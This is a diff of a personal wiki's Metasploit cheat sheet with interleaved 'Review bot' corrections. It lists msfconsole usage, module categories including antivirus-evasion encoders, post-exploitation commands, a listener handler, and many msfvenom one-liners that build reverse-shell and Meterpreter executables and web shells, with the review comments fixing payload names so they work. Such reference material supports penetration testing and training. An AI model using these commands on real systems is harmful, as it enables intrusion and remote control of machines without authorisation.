The gMan nixWiki

Because the mind is made of Teflon...

cheat_sheets_metasploit

Differences

This shows you the differences between two versions of the page.

cheat_sheets_metasploit [2022/12/28 00:33] – [Search for Module] gman
cheat_sheets_metasploit [2022/12/31 21:50] (current) – [Two Common Commands] gman
Line 19: Line 19:
   * ''msfconsole'' starts the program and drops you off at a prompt: ''msf6 >'' (or ''msf5 >'')   * ''msfconsole'' starts the program and drops you off at a prompt: ''msf6 >'' (or ''msf5 >'')
   * Almost any Linux command can be run from the ''msf6'' prompt (e.g., ''ls'', ''ping'', ''clear'', etc.   * Almost any Linux command can be run from the ''msf6'' prompt (e.g., ''ls'', ''ping'', ''clear'', etc.
 +
 +==== 4 Main Activities ====
 +
 +There are 4 main activities you will most always do when using Metasploit:
 +  - Start the console: command line ''msfconsole''
 +    * Review available options at the ''msf'' prompt with: ''?''.
 +  - Select an exploit: this will get you into the target...
 +    * See a full list: ''show exploits''
 +    * Search: ''search [keyword]:[arg] [keyword]:[arg]''
 +  - Select a payload: this is what you want to do once you're in...
 +    * See a full list: ''show payloads''
 +  - Run the exploit: 
 +    * Set any necessary options first (e.g., rhost)
 +    * ''run'' your exploit
  
 ==== Help ==== ==== Help ====
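Review bot: the "4 Main Activities" list (lines 26-38) never shows the command that actually selects a module; after ''show exploits'' or ''search'' the reader still has to load the exploit with ''use <module path>'', and step 3 needs ''set payload <payload path>'' before step 4 can run. Suggest adding those two commands under steps 2 and 3, and in step 4 pointing at ''show options'' (or just ''options'') so the reader sees which options are marked required instead of guessing at ''rhost''; on current msf6 the target option is ''RHOSTS'' for nearly all modules, and ''exploit'' is an alias for ''run'' at that prompt. Minor: the parenthesis opened on line 24 ("(e.g., ''ls'', ''ping'', ''clear'', etc.") is never closed.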
Line 35: Line 49:
   * Example, CVE: ''search ms17-101''   * Example, CVE: ''search ms17-101''
   * Example, type: ''search type:auxiliary telnet''   * Example, type: ''search type:auxiliary telnet''
 +
 +**Alternative Search Option:** Rapid7 maintains a [[https://www.rapid7.com/db/?type=metasploit | searchable web-based exploit database]]. Find your exploit there and tell msf to use it.
  
 ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on. ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on.
  
-**Search Parameters (Keywords):**+**Parameters (Keywords):**
  
-^  Keyword  ^  Description  +^  Keyword   ^  Description                              
-| app  | client or server attack | + app       | client or server attack                   
-author  | search by module author | +|  author    | search by module author                   
-bid  | search by BugTrack ID | +|  bid       | search by BugTrack ID                     
-| cve  | search by CVE ID | + cve       | search by CVE ID                          
-| edb  | search by Exploit-DB ID | + edb       | search by Exploit-DB ID                   
-name  | search by descriptive name | +|  name      | search by descriptive name                
-| platform  | search by platform (Windows, Linux, etc.) | + platform  | search by platform (Windows, Linux, etc.) | 
-| ref  | modules with a specific ref. | + ref       | modules with a specific ref.              
-| type  | search by type (exploit, auxiliary, post) |+ type      | search by type (exploit, auxiliary, post) |
  
 ==== Search Result Ranking ==== ==== Search Result Ranking ====
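Review bot: line 42 labels ''search ms17-101'' as a CVE example, but an ms17-xxx string is a Microsoft security bulletin number, not a CVE; with the ''cve'' keyword from the table the form is ''search cve:YYYY-NNNN'', so either relabel the example as a bulletin/name search or change it to the ''cve:'' form so it matches the table. In the table, ''bid'' is the Bugtraq ID (line 54 spells it "BugTrack"), and line 47 should read "the full path of the module". Dropping "Search" from the heading on line 49 hides that these keywords are arguments to ''search''; suggest "Search Parameters (Keywords)" or a lead-in sentence saying so.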
Line 114: Line 130:
 ===== Modules & Categories ===== ===== Modules & Categories =====
  
-**[1] Auxiliary:** Any supporting module, such as scanners, crawlers and fuzzers. Found here:+==== [1] Auxiliary ==== 
 + 
 +Any supporting module, such as scanners, crawlers and fuzzers. Found here:
  
 <code>/usr/share/metasploit-framework/modules/auxiliary</code> <code>/usr/share/metasploit-framework/modules/auxiliary</code>
  
-**[2] Encoders:** Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.+==== [2] Encoders ==== 
 + 
 +Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
   * Encoders can have a limited success rate as antivirus solutions can perform additional checks.   * Encoders can have a limited success rate as antivirus solutions can perform additional checks.
   * Found here:   * Found here:
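Review bot: line 74 says encoders "encode the exploit and payload"; an encoder transforms only the payload bytes, and its primary purpose is to avoid bad characters (null bytes, newlines, characters the vulnerable input filters) rather than to defeat antivirus, which the bullet on line 75 already concedes works poorly. Suggest rewording to "encode the payload to avoid bad characters; as a side effect the bytes no longer match a static signature" so readers do not pick an encoder expecting evasion.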
Line 124: Line 144:
 <code>/usr/share/metasploit-framework/modules/encoders</code> <code>/usr/share/metasploit-framework/modules/encoders</code>
  
-**[3] Evasion:** Direct attempts to evade antivirus software.+==== [3] Evasion ==== 
 + 
 +Direct attempts to evade antivirus software.
   * Encoders will encode the payload and thus obfuscate the signature.   * Encoders will encode the payload and thus obfuscate the signature.
   * Evasion modules are an actual direct attempt to evade antivirus software.   * Evasion modules are an actual direct attempt to evade antivirus software.
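Review bot: lines 82-84 state the encoder/evasion distinction three times; suggest collapsing to one sentence that gives the practical difference, namely that an encoder is applied to a payload at generation time (''-e'' in msfvenom, or automatically by an exploit), while an evasion module is run like any other module with ''run'' and writes out a finished artifact that you then deliver yourself.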
Line 130: Line 152:
 <code>/usr/share/metasploit-framework/modules/evasion</code> <code>/usr/share/metasploit-framework/modules/evasion</code>
  
-**[4] Exploits:** Modules that... well... exploit. Very neatly organized by target system here:+==== [4] Exploits ==== 
 + 
 +Modules that... well... exploit. Very neatly organized by target system here:
  
 <code>/usr/share/metasploit-framework/modules/exploits</code> <code>/usr/share/metasploit-framework/modules/exploits</code>
  
-**[5] NOPs:** NOPs (No OPeration) do nothing, literally.+==== [5] NOPs ==== 
 + 
 +NOPs (No OPeration) do nothing, literally.
   * They are often used as a buffer to achieve consistent payload sizes.   * They are often used as a buffer to achieve consistent payload sizes.
  
 <code>/usr/share/metasploit-framework/modules/nops</code> <code>/usr/share/metasploit-framework/modules/nops</code>
  
-**[6] Payloads:** Payloads are codes that will run on the target system.+==== [6] Payloads ==== 
 + 
 +Payloads are codes that will run on the target system.
   * Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.   * Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.
   * Examples: get a shell, load malware, load a backdoor, run a command, etc.   * Examples: get a shell, load malware, load a backdoor, run a command, etc.
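Review bot: the NOP bullet on line 97 gives only the padding use; the other reason exploits generate a NOP sled is that execution entering anywhere in the sled slides forward into the payload, which tolerates an imprecise return address, and that is worth one sentence since it explains why the module category exists at all. Line 103 should read "Payloads are code that will run on the target system" rather than "codes".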
Line 159: Line 187:
     * Example: ''windows/x64/shell/reverse_tcp''     * Example: ''windows/x64/shell/reverse_tcp''
  
-**[7] Post:** Post modules are useful during the final, post-exploitation phase. Found here:+==== [7] Post ==== 
 + 
 +Post modules are useful during the final, post-exploitation phase. Found here:
  
 <code>/usr/share/metasploit-framework/modules/post</code> <code>/usr/share/metasploit-framework/modules/post</code>
  
 ---- ----
 +
 +===== Syntax (Examples) =====
 +
 +==== Two Common Commands ====
 +
 +After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try: 
 +
 +<code>
 +# priv esc to admin
 +getsystem
 +
 +# get a shell in the exploit directory on the target
 +shell
 +</code>
 +
 +
 +==== msfvenom ====
 +
 +See [[cheat_sheets_various#msfvenom | here]].       
 +
 +==== MSF Handler ====
 +
 +''msfconsole''...Handlers should be in the following format:
 +
 +<code>
 +use exploit/multi/handler
 +set PAYLOAD <Payload name>
 +set LHOST <LHOST value>
 +set LPORT <LPORT value>
 +</code>
 +
 +==== Non-Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Non-Meterpreter Web Payloads ====
 +
 +<code>
 +# asp 
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
 +
 +# php
 +msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
 +
 +==== Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +
 +# x86
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Meterpreter Web Payloads ====
 +
 +<code>
 +# asp
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
 +
 +# php
 +msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
  
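Review bot: two of the msfvenom payload names in this hunk contradict their headings. Under "Staged Payloads for Windows" the x64 line (line 156) uses ''windows/x64/shell_reverse_tcp'', which is the stageless payload; the staged one is ''windows/x64/shell/reverse_tcp'' (slash between ''shell'' and ''reverse_tcp'' means staged, underscore means stageless, the same convention the Meterpreter section on lines 212-225 follows correctly). Under "Stageless Payloads for Windows" the x64 line (line 166) uses ''windows/shell_reverse_tcp'', which is the x86 payload; it should be ''windows/x64/shell_reverse_tcp''. Related: the "MSF Handler" block on lines 141-145 should say that ''PAYLOAD'' must be exactly the string passed to msfvenom ''-p'' (a staged binary needs a staged handler and vice versa), and it is missing the final ''run'' (or ''exploit -j'' to keep the handler in the background). In "Meterpreter Web Payloads", the jsp and war lines (255, 258) still use ''java/jsp_shell_reverse_tcp'', which is a plain JSP shell, not Meterpreter, so either move them or note the exception. In "Two Common Commands", ''getsystem'' attempts to elevate to NT AUTHORITY\SYSTEM, not "admin", and only succeeds when the session already has local admin rights or an impersonation privilege, so suggest "check ''getuid'' before and after"; and ''shell'' opens cmd.exe or sh in the current working directory of the process hosting Meterpreter (see ''pwd''), not in an "exploit directory".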
cheat_sheets_metasploit.1672187607.txt.gz · Last modified: by gman